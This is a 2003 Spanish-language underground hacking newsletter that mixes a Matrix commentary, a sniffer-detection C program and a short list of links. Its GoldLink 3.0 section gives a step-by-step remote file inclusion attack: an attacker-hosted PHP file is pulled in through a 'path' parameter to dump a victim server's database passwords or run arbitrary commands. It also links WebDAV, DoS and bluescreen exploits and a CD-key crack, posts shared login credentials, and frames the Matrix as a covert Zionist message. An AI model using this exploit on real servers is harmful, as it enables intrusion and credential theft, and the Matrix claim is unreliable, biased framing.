Mostrando mensaje 161     < Anterior | Siguiente > Responder a este mensaje Asunto: [NewsUnder] Sniffers, GoldLink, WebDAV, Biblioteca, Matrix Fecha: Domingo, 25 de Mayo, 2003  13:11:52 (-0300) Autor: ][ CyERVo ][ <info @.........ar> ==================================== News Under - by La Covacha Underground ==================================== 4687 Members - Buenos Aires, Argentina ==================================== HTTP://www.LCU.com.ar HTTP://www.pkaotico.com.ar ==================================== 1] Intro 2] Matrix Reloaded 3] Detectando Sniffers 4] Hackeando GoldLink 3.0 5] WebDAV 6] Listas & Biblioteca 7] Misc ==================================== -------------------------------- 1] Intro -------------------------------- - Se buscan colaboradores para el boletin, info@lcu.com.ar - irc.undernet.org #lcu - irc - http://www.lcu.com.ar/foro - foro - Que sucedio realmente en la revolucion de mayo? no fue una evolucion, en vez de REvolucion? http://www.historiadelpais.com.ar/mayo.htm -------------------------------- 2] Matrix Reloaded -------------------------------- http://images.insecure.org/nmap/images/matrix/ http://www.ciudadfutura.com/matrix/crit05.htm http://www.hispasec.com/unaaldia/1665/ http://www.farq.unr.edu.ar/carrera/frames/catedras/analisis_villalba/Webs/We bsTallerT/libro%20VII.htm http://whatisthematrix.warnerbros.com/rl_cmp/animatrix_main3.html Todo lo que ocurre en Matrix es una alegoría del mito de las cavernas de Platon. http://www.farq.unr.edu.ar/carrera/frames/catedras/analisis_villalba/Webs/We bsTallerT/libro%20VII.htm Todo lo que ocurre en Matrix es una alegoría de la historia del judaísmo. Un pueblo (o raza) oprimido y perseguido que espera ansiosamente la llegada de su mesías o salvador (en este caso Neo) y que resiste en la única ciudad libre de Sión (o Zion en la película). Lo único que faltaba era que Morfeo se llamase Moisés. También el detalle de los números del principio, que son claramente letras hebreas. Para no parecer tan descaradamente un mensaje claramente sionista, los hermanos (que, casualmente, son judíos) mezclan también toques cristianos (Trinity, la muerte y posterior resurrección) con mitología griega (Morfeo y el Oráculo, a parte del ya mencionado mito de la caverna) y filosofía cartesiana (el no saber si estamos dormidos o despiertos), oriental, ciberpunk, manga, etc. -------------------------------- 3] Detectando Sniffers -------------------------------- Una manera de detectar un sniffer seria utilizar este comando: "ifconfig -a" Hay que chequear si existen interfaces en modo promiscuo. Otra forma seria el utilizar este comando: "netstat -r" otra forma seria la de ejecutar un programa que te ayude a realizar la deteccion como en nosniff.c . El codigo C esta a continuacion : #include #include #include #include #if defined (__linux__) #include #else #include #endif #define size(p) (sizeof(p)) int dev_flags=0, device_flags=0, set_look_all=0; int main(int argc, char **argv) { struct ifreq ifreq, *ifr; struct ifconf ifc; char buf[BUFSIZ], *cp, *cplim; if(argc <= 1) set_look_all++; if((dev_flags = socket(PF_INET, SOCK_DGRAM, 0)) < 0) { fprintf(stderr, "Error "); perror("socket"); exit(1); } ifc.ifc_len = sizeof(buf); ifc.ifc_buf = buf; if(ioctl(dev_flags, SIOCGIFCONF, (char *)&ifc) < 0) { perror("SIOCGIFCONF"); exit(1); } ifr = ifc.ifc_req; cplim=buf+ifc.ifc_len; for(cp = buf; cp < cplim; cp += sizeof (ifr->ifr_name) + size(ifr->ifr_addr)) { ifr = (struct ifreq *)cp; if(argv[1]) if(strcmp(ifr->ifr_name, argv[1]) && !set_look_all) continue; ifreq = *ifr; if(ioctl(dev_flags, SIOCGIFFLAGS, (char *)&ifreq) < 0) { fprintf(stderr, "SIOCGIFFLAGS: %s (get interface flags): %s ", ifr->ifr_name,strerror(errno)); continue; } device_flags=0; device_flags = ifreq.ifr_flags; fprintf(stdout, "%s: ", ifreq.ifr_name); if((device_flags & IFF_PROMISC) != 0) fprintf(stdout, "Dispositivo en modo Promiscuo: Sniffer detectado. "); else fprintf(stdout, "No en modo Promiscuo: Ningun Sniffer detectado. "); if(!set_look_all) exit(0); // finalizado else continue; //siguiente dispositivo } if(!set_look_all) fprintf(stdout, "%s: Dsipositivo desconocido. ", argv[1]); // dispositivo no encontrado } para compilarlo : gcc -o nosniff nosniff.c este programa no puede ser compilado en SunOS -------------------------------- 4] Hackeando GoldLink 3.0 -------------------------------- Pues bien, nos vamos a cualquier servidor que no soporte PHP (www.nuestroserver.com en el ejemplo) y creamos el fichero variables.php con el siguiente contenido: -- <? function Conectarse() { $fp=fopen("variables.php",r); fpassthru($fp); die(); } ?> -- Despues vamos a nuestro navegador y tecleamos: http://www.victima.com/goldlink/list.php?path=http://www.nuestroserver.com Le damos a intro, ponemos ver codigo fuente y tenemos el fichero en cuestion con las claves de la base de datos. En vez de eso podriamos haber hecho otra cosa, como system("ls -l"), leer otro fichero, etc. Solo hay que meter el codigo que queramos en la funcion Conectarse() (de nuestro server), y se ejecutara en el server de la victima con privilegios de httpd. http://www.undersec.com/advisories/GoldLink_Advisory.txt http://www.l-c-u.com.ar/foro/viewtopic.php?t=225 -------------------------------- 5] WebDAV -------------------------------- Ya que varios preguntaron... y pidieron el exploit y el advisorie, aqui lo tienen. Unchecked Buffer in Windows Component could Cause Web Server Compromise (WebDAV) http://www.securiteam.com/windowsntfocus/5FP0B2K9FY.html WebDAV Exploit Code Released http://www.securiteam.com/exploits/5SP0L159FC.html -------------------------------- 6] Listas & Biblioteca -------------------------------- USER: hdpz PASS: cachavacha http://www.lcu.com.ar/biblioteca/full http://listas.agujero.com/lista/rootmode/alta -------------------------------- 7] Misc -------------------------------- - Contando Hosts Nateados http://www.research.att.com/~smb/papers/fnat.pdf - Crackeando la key del CS http://www.delikon.de/zips/cd-key.zip - Half-Life Server 3.1.1.0 (Windows and Linux) DoS http://www.securiteam.com/exploits/5RP0P0A9PK.html - Blue Screen en W2000 Server sp3 con IE Sp1 y Windows XP Pro sin service pack / NetMeeting http://nautopia.coolfreepages.com/vulnerabilidades/callto_bluescreen.htm <bds> para los que tengan un celular nokia, y quieran entrar a la configuracion de su celular <bds> * 3 0 0 1 # XXXXX # <bds> "XXXXX" es la clave para entrar, por defecto es 12345. - Lista de evacuados por las inundaciones en Santa Fe, Argentina. http://rectorado.unl.edu.ar/evacuados/ - Dona dinero a los evacuados a traves de internet. https://www.concaritas.org/asp/Ingreso_Importe.asp?ProyectoID=697&nombre_pro yecto=AYUDA%20INMEDIATA%20A%20INUNDADOS%20Porvincia%20de%20Santa%20Fe&monto_ solicitado=50.000,00&monto_recaudado=29.731,98 http://www.concaritas.org - Legisladores crean leyes anti-spamming. http://www.cnn.com/2003/TECH/internet/05/22/congress.spam.ap/index.html - FORO / Solventa tus dudas, comparti ideas y proyectos. Enterate de lo ultimo que sale. http://www.lcu.com.ar/foro http://www.lcu.com.ar/foro/viewtopic.php?t=183 WarDialing! 0800-666-xxx - Nuevas secciones http://www.lcu.com.ar/misc/spam.php http://www.lcu.com.ar/sensible/ ______________________ - CyV - http://www.lcu.com.ar - Argentina - 11111010011 ______________________